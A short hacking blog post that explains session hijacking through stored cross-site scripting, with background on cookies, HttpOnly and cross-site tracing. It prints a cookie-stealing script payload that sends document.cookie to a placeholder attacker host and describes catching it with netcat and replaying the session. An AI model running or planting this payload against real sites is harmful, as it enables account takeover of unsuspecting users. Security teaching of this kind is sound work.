Skip to main content

Session HI-Jacking


                      Session Hijacking in XSS to MYSQL File


Hi, after a long Time i am coming with my new post how to Hijack The someone Session.
sounds Interesting. is it possible to hijacking or steal someone cookie or someone Session. Yes! it's possible. I am going to telling you how's it Possible.
 
First! of All, it is also a Web-App Vulnerability. In OWASP TOP-10  A-2 Broken authentication   and Session managment. Covers the Session managment issues.

(1) Session sniffing
(2) Session fixation
(3) Session hijacking

First, for non-technical persons, they want to know what is Session or what is Cookie?

A session can be defined as a server-side storage of information that is desired to persist throughout the user's interaction with the web site or web application. 

A cookie is a small piece of text stored on a user's computer by their browser. Common uses for cookies are authentication, storing of site preferences,  and server session identification.

Now, How i am able to steal Some one Session.

If The web application is Vulnerable from XSS (cross site scripting) it is also a OWASP-TOP 10 Vulnerability. A-3 Cross Site Scripting (XSS) we can steal someone Session or Cookie Using XSS Session-id Stealing script. but there one condition the cookie is not set to HTTP-only flag. If the cookie is set to HTTP-only flag we can not steal the session-id till the TRACE method is not enabled on Server. if The TRACE method is enabled and Cookie is set to HTTP-only there is a Vulnerabilty called XST(Cross Site Tracing) from this vulnerabilty we can also steal the Cookie which is set to HTTP-only  flag. XSS(cross site scripting) is a client side attack. Thats why it's effected your browser.

Next Step, is MITM Attack (Man in the middle) Attack & we can also sniff the traffic of the victim's machine etc.


I am going to telling you using XSS (cross site Scipritng) Session-id Stealing Script. In my demo web-application the application is vulnerable from Stored-XSS.

<script>document.write('<img src="http://attacker-ip/website:port-no/?'+document.cookie+'"/>');</script>
 
when this script executed in the web application it writes the cookie of the victim on Attacker's ip address or Attacker Domain name where the port no. is listening.

I  used NC(netcat) for capturing the Victim's Cookie.

where the port no. 1234 is listen

after Capturing The cookie i used Firefox Add-on (Web devoloper) for setting the victim session-id and refersh. the page.

Show the Full tutorial in this video below.



 i am able to view victim's Session. :) :) :) :) 

Thanx for watching the Video & reading this. 

For any query:- kindly post your comments. :)



Comments

Post a Comment

Popular posts from this blog

PowerShell for Ethical Hackers

                                                                                                              PowerShell For Ethical Hackers Blog Series  Hello my hacking buddies, Finally i am back with my blog series PowerShell for Ethical Hackers. we all know what is powershell and it easies our task same like linux bash scripting. in this blog series i'll show you some useful test cases which i have performed in real life penetration testing and i am going to show you how to write powershell script from basics to advance level. So, let's Start 😊😉 Part 1: Introduction to PowerShell, why PowerShell is important for Ethical Hackers and PowerShell Framework. Penetration Testing using PowerShell...
14 comments
Read more

PowerShell for Ethical Hackers Part 3 Introduction to PowerShell ISE & PowerShell ISE Add-On

PowerShell for Ethical Hackers Blog Series                       Part 3: Introduction to PowerShell ISE and PowerShell  ISE Add-On PowerShell ISE is Integrated Scripting Environment. In PowerShell ISE you can run commands, write scripts ,test and debug your scripts in Graphic User Interface Application.  Windows PowerShell ISE provides you many features which you can use in PowerShell ISE for do your task easy some of the features are mentioned below. Multiline Editing Selective Execution PowerShell ISE Modules Restart Manager and Auto Save Description of PowerShell ISE Features Multiline Editing: Multi Line editing is a nice feature in PowerShell ISE it saves a lot of time because at a same time you can edit multiple lines in a same file. Selective Execution:   Selective execution provides you capability to run the selective code which you want to test it means you can select...
Post a Comment
Read more